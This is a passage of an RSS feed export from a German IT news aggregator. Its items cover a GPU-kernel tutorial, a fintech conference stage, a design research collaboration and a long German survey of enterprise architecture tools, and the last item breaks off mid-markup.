<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=designing+highperformance+fintech+saas%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 03:29:19 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 03:29:19 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=designing+highperformance+fintech+saas%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=designing+highperformance+fintech+saas%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Designing High-Performance GPU Kernels with TileLang: Tensor-Core GEMM, Fused Softmax, FlashAttention, and Autotuning]]></title>
<description><![CDATA[Explore TileLang, a high-level Python domain-specific language that simplifies the design of high-performance GPU kernels. This tutorial provides a step-by-step approach to implementing complex workloads—including tiled tensor-core GEMM, fused softmax, and FlashAttention—while letting the compile...]]></description>
<link>https://tsecurity.de/de/3694838/ai-nachrichten/designing-high-performance-gpu-kernels-with-tilelang-tensor-core-gemm-fused-softmax-flashattention-and-autotuning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694838/ai-nachrichten/designing-high-performance-gpu-kernels-with-tilelang-tensor-core-gemm-fused-softmax-flashattention-and-autotuning/</guid>
<pubDate>Sat, 25 Jul 2026 20:26:45 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Explore TileLang, a high-level Python domain-specific language that simplifies the design of high-performance GPU kernels. This tutorial provides a step-by-step approach to implementing complex workloads—including tiled tensor-core GEMM, fused softmax, and FlashAttention—while letting the compiler handle intricate thread mapping, memory layouts, and low-level CUDA instruction generation.</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/25/designing-high-performance-gpu-kernels-with-tilelang-tensor-core-gemm-fused-softmax-flashattention-and-autotuning/">Designing High-Performance GPU Kernels with TileLang: Tensor-Core GEMM, Fused Softmax, FlashAttention, and Autotuning</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TechCrunch Disrupt 2026’s new Smart Money Stage explores fintech, payments, AI, and everything between ]]></title>
<description><![CDATA[Money has evolved into far more than the cash in your wallet or your bank account. And at TechCrunch Disrupt 2026, we’re devoting an entire stage to that progression.]]></description>
<link>https://tsecurity.de/de/3694728/ai-nachrichten/techcrunchdisrupt-2026s-new-smart-money-stage-explores-fintech-payments-ai-and-everything-between/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694728/ai-nachrichten/techcrunchdisrupt-2026s-new-smart-money-stage-explores-fintech-payments-ai-and-everything-between/</guid>
<pubDate>Sat, 25 Jul 2026 19:49:42 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Money has evolved into far more than the cash in your wallet or your bank account. And at TechCrunch Disrupt 2026, we’re devoting an entire stage to that progression.]]></content:encoded>
</item>
<item>
<title><![CDATA[HPI-MIT design research collaboration creates powerful teams]]></title>
<description><![CDATA[Together, the Hasso Plattner Institute and MIT are working toward novel solutions to the world’s problems as part of the Designing for Sustainability research program.]]></description>
<link>https://tsecurity.de/de/3694492/it-security-nachrichten/hpi-mit-design-research-collaboration-creates-powerful-teams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694492/it-security-nachrichten/hpi-mit-design-research-collaboration-creates-powerful-teams/</guid>
<pubDate>Sat, 25 Jul 2026 19:01:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Together, the Hasso Plattner Institute and MIT are working toward novel solutions to the world’s problems as part of the Designing for Sustainability research program.]]></content:encoded>
</item>
<item>
<title><![CDATA[18 Enterprise-Architecture-Tools]]></title>
<description><![CDATA[Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. 
					Foto: I Believe I Can Fly – shutterstock.com




Enterprise Architecture (EA) Tools unterstützen Unternehmen und Organisationen dabei, mit ihren IT-Strategien die Geschäftszie...]]></description>
<link>https://tsecurity.de/de/3694429/it-security-nachrichten/18-enterprise-architecture-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694429/it-security-nachrichten/18-enterprise-architecture-tools/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. " title="Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. " src="https://images.computerwoche.de/bdb/3284195/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. </p></figcaption></figure><p class="imageCredit">
					Foto: I Believe I Can Fly – shutterstock.com</p></div>




<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2789207/eam-gibt-orientierung-in-der-digitalen-transformation.html" title="Enterprise Architecture" target="_blank">Enterprise Architecture</a> (EA) Tools unterstützen Unternehmen und Organisationen dabei, mit ihren IT-Strategien die Geschäftsziele optimal zu unterstützen. Sie sorgen ebenfalls dafür, dass Unternehmen ihre Roadmaps für die <a href="https://www.computerwoche.de/article/2794425/wie-digitale-transformation-richtig-geht.html" title="digitale Transformation" target="_blank">digitale Transformation</a> geordnet vorantreiben können. EA Tools bieten dafür unter anderem Collaboration-, Reporting-, Testing- und Simulationsfunktionen. Mit deren Hilfe lassen sich Modelle implementieren, die Geschäfts- und IT-Prozesse gezielt verbessern.</p>



<p class="wp-block-paragraph">Um die beste Lösung für Ihr Unternehmen zu finden, sollten Sie zuerst prüfen, ob sich das jeweilige Tool mit Ihrem Technologie-Stack integrieren lässt. Anschließend gilt es abzuwägen, ob die Informationen, Diagramme und Tabellen, die die Software zur Verfügung stellt, für das Unternehmen auch einen echten Nutzwert haben.</p>



<h2 class="wp-block-heading">Empfehlenswerte Enterprise-Architecture-Tools</h2>



<p class="wp-block-paragraph">Nachfolgend finden Sie einen Überblick über die wichtigsten Enterprise-Architecture-Tools – in alphabetischer Reihenfolge. Sie stellen einen Mix aus Visualisierungs-, Collaboration- und Project-Management-Funktionen bereit und unterstützen eine Vielzahl von Enterprise Architecture Frameworks.</p>



<p class="wp-block-paragraph"><strong><a href="https://www.ardoq.com/" title="Ardoq" target="_blank" rel="noopener">Ardoq</a></strong></p>



<p class="wp-block-paragraph">Nachdem zuerst über einfache Formulare Informationen von Usern, Entwicklern und sonstigen Stakeholdern im Unternehmen eingesammelt wurden, lässt sich mithilfe von Ardoq ein digitaler Zwilling der gesamten Organisation erstellen. Der Ansatz setzt also darauf, die Menschen, die in ihren Rollen mit den verschiedensten Systemen arbeiten, realistisch in ihrer Arbeitswelt abzubilden.</p>



<p class="wp-block-paragraph">Jede Mitarbeiterin und jeder Mitarbeiter im Unternehmen kann später von den Netzwerkvisualisierungen und Datenfluss-Diagrammen profitieren, um seine eigene Rolle optimal zu unterstützen und den Arbeitsplatz immer wieder anzupassen und zu modernisieren. Das Tool lässt sich mit den wichtigsten Cloud-Plattformen integrieren. Es bietet eine API, die individuelle Anpassungen in allen wichtigen Programmiersprachen (Python, C#, Java, etc.) ermöglicht.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>“Architektonischen Stress” bei Lastspitzen simulieren, falls größere Veränderungen bevorstehen;</p></li>



<li><p>Verstehen, wie verändertes Nutzerverhalten neue Anforderungen generiert;</p></li>



<li><p>Application Portfolio Management, um besser strategisch zu planen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://atollgroup.eu/samu-enterprise-architecture-tool/" title="Atoll Group SAMU" target="_blank" rel="noopener">Atoll Group SAMU</a></strong></p>



<p class="wp-block-paragraph">Das EA-Tool SAMU macht die Enterprise Architecture sichtbar, indem es tiefe Verknüpfungen zwischen On-Premises-Systemen, dem Cloud-Layer und Tools für das Business Process Management aufzeigt. Das Tool der Atoll Group bietet vielfältige Integrationsmöglichkeiten, zum Beispiel mit Monitoring-Tools (etwa Tivoli, ServiceNow), Configuration-Management-Datenbanken (zum Beispiel CA, BMC) oder Service-Organisations-Tools (BMC, HPE). Alle Informationen fließen in ein zentrales Datenmodell ein, das um den zusätzlichen Input der Stakeholder weiter angereichert wird.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Enterprise-Architektur visualisieren;</p></li>



<li><p>strategische Planungsprozesse und Architektur-Reviews mit Informationen unterfüttern;</p></li>



<li><p>mithilfe einer visuellen Verständnisgrundlage die Kommunikation verbessern.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.avolutionsoftware.com/enterprise-architecture/" title="Avolution Abacus" target="_blank" rel="noopener">Avolution Abacus</a></strong></p>



<p class="wp-block-paragraph">Dieses Tool erfasst die Breite und den Umfang der Unternehmensarchitektur mit Hilfe eines auf Diagrammen basierenden Dashboards. Die Integration mit gängigen Tools wie SharePoint, <a href="https://www.computerwoche.de/k/excel,3461" target="_blank" class="idgGlossaryLink">Excel</a>, Visio, Google Sheets, Technopedia oder ServiceNow vereinfacht die Nutzung. Abacus wurde inzwischen auch um einen Machine-Learning-Layer ergänzt, der es Anwendern ermöglicht, ein Modell zu trainieren, das ihnen beispielsweise hilft zu erkennen, wer im Unternehmen für welches System verantwortlich ist.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>die IT für das gesamte Unternehmen “öffnen”, um ein allgemeines Verständnis der Datenflüsse zu erzeugen;</p></li>



<li><p>umfassendes Enterprise Modeling, um eine Roadmap für künftige Entwicklungen zu erstellen;</p></li>



<li><p>Business-Metriken tracken, die mit der Unternehmens-Performance zusammenhängen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.boc-group.com/de/adoit/" title="BOC Group ADOIT" target="_blank" rel="noopener">BOC Group ADOIT</a></strong></p>



<p class="wp-block-paragraph">ADOIT soll Teams dabei unterstützen, Ressourcen zu verwalten, Bedarfe vorherzusagen und Assets zu tracken. Dazu mappt das Tool jedes System oder Softwarepaket mit einem Objekt. Die Datenflüsse zwischen den Systemen werden in Beziehungen umgewandelt, die von diesen Objekten mithilfe eines anpassbaren Metamodells erfasst werden. Geschäftsprozesse können auf ähnliche Weise über ein gut integriertes Begleitprodukt namens ADONIS modelliert werden. ADOIT ist Web-basiert und lässt sich auch mit Tools wie Atlassian Confluence integrieren, um die Datenerfassung und -entwicklung zu beschleunigen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>ein unternehmensweites Modell erstellen, das bei sämtlichen Teammitgliedern ein Verständnis über den Stack schafft – und wie man diesen verbessern kann;</p></li>



<li><p>vollständiger Zugriff auf EA-Daten über eine Mobile-Anwendung;</p></li>



<li><p>bei Fusionen und Übernahmen den Tech-Bereich durch genaues Asset-Mapping orchestrieren.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="Mega Hopex" href="https://www.mega.com/hopex-platform" target="_blank" rel="noopener">Bizzdesign Hopex</a></strong></p>



<p class="wp-block-paragraph">Nach der Übernahme von Mega International zählt die Hopex-Plattform zum Portfolio von Bizzdesign. Sie soll dabei unterstützen, Unternehmensanwendungen zu modellieren und dabei ein Verständnis der von ihnen unterstützten Geschäfts-Workflows schaffen. Dabei liegt ein Schwerpunkt auf den Bereichen Data Governance und Risikomanagement. Hopex basiert auf Microsoft <a class="idgGlossaryLink" href="https://www.computerwoche.de/article/2732704/microsoft-azure-mit-der-deutschen-cloud-zu-neuen-geldquellen.html" target="_blank">Azure</a> und stützt sich auf eine Reihe offener Standards wie GraphQL und REST Queries, um Informationen aus Komponentensystemen zu sammeln. Das Reporting ist mit den Office-Tools von Microsoft sowie mit grafischen Lösungen wie Tableau und Qlik integriert.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>datengestützte Erkenntnisse herbeiführen, um Cloud- und Anwendungsbereitstellung zu steuern;</p></li>



<li><p>akkurate Nutzungsmodelle erstellen, um Architekturanforderungen zu verstehen;</p></li>



<li><p>eine Bedarfsschätzung mit Umfragen und anderen Tools vornehmen, um für die Zukunft zu planen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://bizzdesign.com/transformation-suite/horizzon" target="_blank" rel="noreferrer noopener">Bizzdesign Horizzon</a></strong></p>



<p class="wp-block-paragraph">Das Tool dient dazu, Business Workflows und den zugrundeliegenden Tech-Stack zu modellieren. Dazu bietet Horizzon ein Graph-basiertes Modell, das Daten von sämtlichen Stakeholdern einsammelt und diese an eine Analytics-Engine weitergibt. Im Ergebnis entstehen Diagramme, die den aktuellen Systemzustand widerspiegeln. Wichtige Schwerpunkte dieses Tools sind <a class="idgGlossaryLink" href="https://www.computerwoche.de/article/2777492/was-sie-ueber-change-management-wissen-muessen.html" target="_blank">Change Management</a> und Zukunftsplanung: Horizzon ist nicht zuletzt dafür konzipiert worden, die Risiken eines Redesigns zu minimieren. Das Toolset unterstützt die wichtigsten Frameworks ArchiMate, TOGAF und BPMN. Neben Mega hat Bizzdesign <a href="https://bizzdesign.com/press-releases/bizzdesign-adds-alfabet-business-following-successful-closing-mega-international" target="_blank" rel="noreferrer noopener">im Januar 2025</a> auch den EA-Geschäftsbereich der Software AG – Alfabet – übernommen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Vorhersage zukünftiger Anforderungen durch Predictive Modeling;</p></li>



<li><p>Orchestrieren von Workflows auf der Basis der technischen und der Business-Architektur;</p></li>



<li><p>Antizipieren von Risiken sowie Security- und Governance-Problemen durch die Modellierung von Datensicherheitsanforderungen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.capstera.com/" target="_blank" rel="noreferrer noopener">Capstera</a></strong></p>



<p class="wp-block-paragraph">Das Tool von Capstera fokussiert darauf, die Business Architecture selbst abzubilden. Value und Process Maps helfen dabei, die Rollen der verschiedenen Unternehmensbereiche zu definieren und nachzuverfolgen. Dabei können im laufenden Prozess Verknüpfungen mit den zugrundeliegenden Softwarprodukten und Tools hinzugefügt werden.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Reports erstellen, die sich erst einmal mit der Business-Architektur selbst beschäftigen;</p></li>



<li><p>Beziehungen zwischen Menschen, Abteilungen und Rollen analysieren;</p></li>



<li><p>die langfristige strategische Planung vorantreiben.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.bee360.com/de/" title="Clausmark Bee360" target="_blank" rel="noopener">Clausmark Bee360</a></strong></p>



<p class="wp-block-paragraph">Teammitglieder, die Clausmarks Flaggschiffprodukt Bee360 (früher Bee4IT) verwenden, wollen eine einfache “Single Source of Truth” über die Workflows im Unternehmen. Ziel ist es, verschiedenen betrieblichen Rollen intelligentere Entscheidungen zu ermöglichen. Das Modul Bee360 FM (Finanzmanagement) bietet etwa die Möglichkeit, Kosten nachzuvollziehen und zuzuordnen. Die Anwender können verschiedene solcher Module miteinander verknüpfen, um EAM, Finanzmanagement, Portfolio Management und Agile Planning nahtlos zu integrieren – bei maximaler Transparenz. </p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>C-Suite-Ebene befähigen, Projekte zu managen und Assets zuzuweisen;</p></li>



<li><p>präzise digitale Zwillinge entwickeln, um ein Verständnis über Datenflüsse zu schaffen und künftige Erweiterungen zu planen;</p></li>



<li><p>integrierte Wissensdatenbank aufbauen, um alle digitalen Workflows zu tracken.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.enterprise-architecture.com/" title="EAS" target="_blank" rel="noopener">EAS</a></strong></p>



<p class="wp-block-paragraph">Das Essential-Paket von EAS (Enterprise Architecture Solutions) nahm als <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Open-Source</a>-Projekt seinen Anfang und hat sich inzwischen zu einer kommerziell verfügbaren Cloud-Lösung weiterentwickelt. Das Tool erstellt ein Metamodell, das die Interaktionen zwischen Systemen und Geschäftsprozessen beschreibt. Ebenfalls enthalten sind Pakete, um gängige Business Workflows wie Datenmanagement oder DSGVO-Compliance zu tracken.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>den technischen Reifegrad der eigenen Architektur evaluieren;</p></li>



<li><p>Sicherheit und Governance durch besseres Asset Tracking optimieren;</p></li>



<li><p>wachsende Systemkomplexität kontrollieren und managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="Orbus Software iServer" href="https://www.orbussoftware.com/" target="_blank" rel="noopener">OrbusInfinity</a></strong></p>



<p class="wp-block-paragraph">Orbus Software hat Anfang 2025 die Akquisition seines Konkurrenten Capsifi <a href="https://www.orbussoftware.com/landing-pages/events/webinars/unlocking-the-future-orbus-acquires-capsifi-a-new-era-of-innovation-partnership-apac" target="_blank" rel="noreferrer noopener">abgeschlossen</a>. Der Anbieter stellt mit OrbusInfinity eine Enterprise-Transformation-Plattform auf KI-Basis zur Verfügung,  die schnellere, bessere Entscheidungen, Kosteinesparungen und Risikominimierung verspricht. Architecture-Teams sollen mit Hifle von OrbusInfinity mit einer Vielzahl von Stakeholdern interagieren können, um eine “digitale Blaupause” ihres Unternehmens zu generieren, die eine einheitliche Sicht auf das aktuelle und künftige Geschäft realisieren soll. Diverse Drittanbieter-Tools lassen sich außerdem mit der Plattform <a href="https://www.orbussoftware.com/product/integrations" target="_blank" rel="noreferrer noopener">integrieren</a>, darunter etwa von Microsoft, Flexera, ManageEngine oder ServiceNow. </p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Stakeholder-Management;</p></li>



<li><p>Enterprise-Landschaften visualisieren;</p></li>



<li><p>Entscheidungsfindung und Datenanalyse automatisieren.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.planview.com/de/" title="Planview Enterprise One" target="_blank" rel="noopener">Planview Enterprise One</a></strong></p>



<p class="wp-block-paragraph">Planview bietet eine ganze Reihe von Produkten, mit denen Unternehmen Teamwork, Prozesse und die Enterprise Architecture nachvollziehen können. Die Enterprise Tools sind in drei Kategorien unterteilt: strategisches Portfolio-Management, Produktportfolio-Management und Projektportfolio-Management. Im Zusammenspiel entstehen hardware- und Software-übergreifende Layer, die rollenbasierte Perspektiven für Führungskräfte und Teammitglieder eröffnen. Das Toolset integriert mit gängigen Ticket-Tracking-Systemen wie Jira, um Workflow-Analysen und Reports zu erstellen. Inzwischen hat Planview nach einer Übernahme neue Tools in sein Portfolio integriert, die früher unter den Namen Daptiv, Barometer und Projectplace bekannt waren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>eine langfristige, strategische Vision für die Architekturentwicklung aufbauen;</p></li>



<li><p>Entwicklungsarbeit auf Projektebene tracken und in eine beliebige Strategie integrieren;</p></li>



<li><p>mit Fokus auf die Customer Experience und die Produktstruktur den Change vorantreiben.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.qualiware.com/" title="QualiWare Enterprise Architecture" target="_blank" rel="noopener">QualiWare Enterprise Architecture</a></strong></p>



<p class="wp-block-paragraph">Das Enterprise Architecture Tool von QualiWare ist Teil einer größeren Sammlung von Modellierungswerkzeugen, die darauf abzielt, sämtliche Geschäftsprozesse zu erfassen. Beispielsweise ist es möglich, einen digitalen Zwillinge zu bauen, mit dem sich Customer Journeys nachvollziehen lassen. Qualiware hat diverse KI-Algorithmen integriert, um Dokumentation und Process Discovery zu optimieren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>ein kollaboratives Ökosystem für Business Manager aufbauen, das ein Verständnis von der Enterprise Architecture vermittelt;</p></li>



<li><p>architektonische Designelemente erfassen, um ein Wissens-Ökosystem rund um den Stack aufzubauen;</p></li>



<li><p>eine breite Beteiligung in Sachen Dokumentationserstellung und -überprüfung fördern.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.erwin.com/de-de/products/erwin-evolve/" title="Quest Erwin Evolve" target="_blank" rel="noopener">Quest Erwin Evolve</a></strong></p>



<p class="wp-block-paragraph">Das Erwin Evolve Tool von Quest hat sich von einem Datenmodellierungs-Tool zu einem System für Enterprise-Architecture- und Geschäftsprozess-Modellierung weiterentwickelt. Um die Komplexität moderner, ineinandergreifender Softwaresysteme und der von ihnen gemanagten Geschäftsprozesse zu durchdringen, können Anwender auf benutzerdefinierte Datenstrukturen zurückgreifen. Das Web-Tool erstellt Modelle, rollenbasierte Diagramme und andere Visualisierungen, die in allgemein zugängliche Dashboards einfließen. Zum Paket gehört ein KI-basiertes Modellierungs-Tool, das Whiteboard-Skizzen integrieren kann.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>einen digitalen Zwilling für die strategische Modellierung der Enterprise Data Architecture erstellen;</p></li>



<li><p>Customer Journeys verstehen;</p></li>



<li><p>Services und Systeme mit Application Portfolio Management tracken.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="LeanIX Enterprise Architecture Suite" href="https://www.leanix.net/de/produkte/enterprise-architecture-management" target="_blank" rel="noopener">SAP LeanIX Enterprise Architecture Suite</a></strong></p>



<p class="wp-block-paragraph">Die Tool-Sammlung von LeanIX umfasst unter anderem Enterprise Architecture Management und andere Bereiche, die für Aufgaben wie <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/cloud-computing,3454" target="_blank">SaaS</a>– und Value-Stream-Management wichtig sind – etwa um Cloud-Deployments und darauf laufende Services zu tracken. Die Daten die dabei über die IT-Infrastruktur gesammelt werden, fließen in ein grafisches Dashboard ein. Das Tool ist eng mit wichtigen Cloud-Workflow-Tools wie Confluence, Jira, Signavio und Lucidchart integriert. Das ist für Teams von Vorteil, die diese Tools bereits nutzen, um ihre Entwicklungsstrategien zu planen und umzusetzen. Seit November 2023 <a href="https://www.leanix.net/de/unternehmen/pressemeldungen/leanix-gehoert-jetzt-zu-sap">ist LeanIX Teil von SAP</a>.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Anwendungsmodernisierung und Cloud-Migration managen;</p></li>



<li><p>Obsoleszenz von Software-Services evaluieren;</p></li>



<li><p>Kosten kontrollieren und managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.servicenow.com/de/" title="ServiceNow" target="_blank" rel="noopener">ServiceNow</a></strong></p>



<p class="wp-block-paragraph">Die Tool-Sammlung von ServiceNow lässt sich auf verschiedene Architekturtypen herunterbrechen, darunter Assets, <a href="https://www.computerwoche.de/article/2785626/wie-devops-die-it-beschleunigen.html" target="_blank" class="idgGlossaryLink">DevOps</a>, Security und Service. Die Tools katalogisieren die unterschiedlichen Hardware- und Softwareplattformen, um Workflows und Datenflüsse im Unternehmen abzubilden und zu verstehen. Ausführliche Reportings und detaillierte Dashboards ermöglichen Analysen, auf deren Grundlage Risiken minimiert und die Ausfallsicherheit der Systeme erhöht werden können.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Tracken von Assets, Services und Systemen, die das Unternehmen ausmachen;</p></li>



<li><p>Governance-Themen, Risikobegrenzung, IT-Management und Security Operations werden in einer Plattform zusammengeführt;</p></li>



<li><p>durch die Integration von CRM-Tools lassen sich auch kundenorientierte Services managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://sparxsystems.com/products/ea/" title="Sparx Systems" target="_blank" rel="noopener">Sparx Systems</a></strong></p>



<p class="wp-block-paragraph">Um Teams und Projekte verschiedener Größe und Komplexität zu unterstützen, hat Sparx vier Versionen seines EA-Tools entwickelt. Allen gemeinsam ist eine UML-basierte Modellierung, mit der sich die Komponenten komplexer Systeme tracken lassen. Eine Simulations-Engine ermöglicht “War Gaming” und vermittelt ein Verständnis darüber, wie sich Fehler ausbreiten und kaskadieren können. Sparx stellt zudem eine Vielzahl von vorgefertigten Design Patterns bereit, um Teams bei der Modellierung zu unterstützen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Nachfrage- und Lastveränderungen zur Prognose künftiger Anforderungen simulieren;</p></li>



<li><p>(potenzielle) Probleme durch eine Verbindungs-Matrix im Auge behalten;</p></li>



<li><p>Dokumentation erstellen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.teamblue.unicomsi.com/products/system-architect/" title="Unicom System Architect" target="_blank" rel="noopener">Unicom System Architect</a></strong></p>



<p class="wp-block-paragraph">System Architect ist eines der Angebote aus Unicoms Team Blue. Es handelt sich um ein Tool, das ein Metamodell verwendet, um automatisiert so viele Daten wie möglich über die laufenden Systeme zu sammeln – manchmal auch durch ein Reverse Engineering von Datenflüssen. Dieses systemweite Datenmodell kann über benutzerdefinierte Dashboards Teammitgliedern aller Rollen zugänglich gemacht werden. Ein weiteres erwähnenswertes Feature: Die Ressourcenzuweisung lässt sich mit Hilfe von Simulationen optimieren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Was-wäre-wenn-Fragen zum Architekturmodell stellen;</p></li>



<li><p>ein Metamodell von Daten und Systemen aufbauen;</p></li>



<li><p>Migrations- und Transformationspläne erstellen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.valueblue.com/bluedolphin" title="ValueBlue BlueDolphin" target="_blank" rel="noopener">ValueBlue BlueDolphin</a></strong></p>



<p class="wp-block-paragraph">Dieses EA-Tool sammelt Daten auf dreierlei Art:</p>



<ol class="wp-block-list">
<li><p>Es importiert Basisdaten auf der Grundlage standardgesteuerter Automatisierung (ITSM, SAM).</p></li>



<li><p>Es arbeitet mit den Dateiformaten von Architekten und Systemdesignern – etwa ArchiMate oder BPMN.</p></li>



<li><p>Es gibt Fragebögen an andere Stakeholder heraus, die auf anpassbaren Vorlagen basieren.</p></li>
</ol>



<p class="wp-block-paragraph">Die aufbereiteten Informationen werden in einer visuellen Umgebung bereitgestellt, die Auskunft über die historische Entwicklung von Systemen gibt.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>systemweite Daten von internen und externen Stakeholdern automatisiert und formularbasiert erfassen;</p></li>



<li><p>zukunftsorientierte Reportings erzeugen, um den Change zu überwachen und voranzutreiben;</p></li>



<li><p>Kooperation und Zusammenarbeit durch offenes Data Reporting fördern.</p></li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.cio.com/article/196069/top-enterprise-architecture-tools.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CIO.com erschienen. </strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



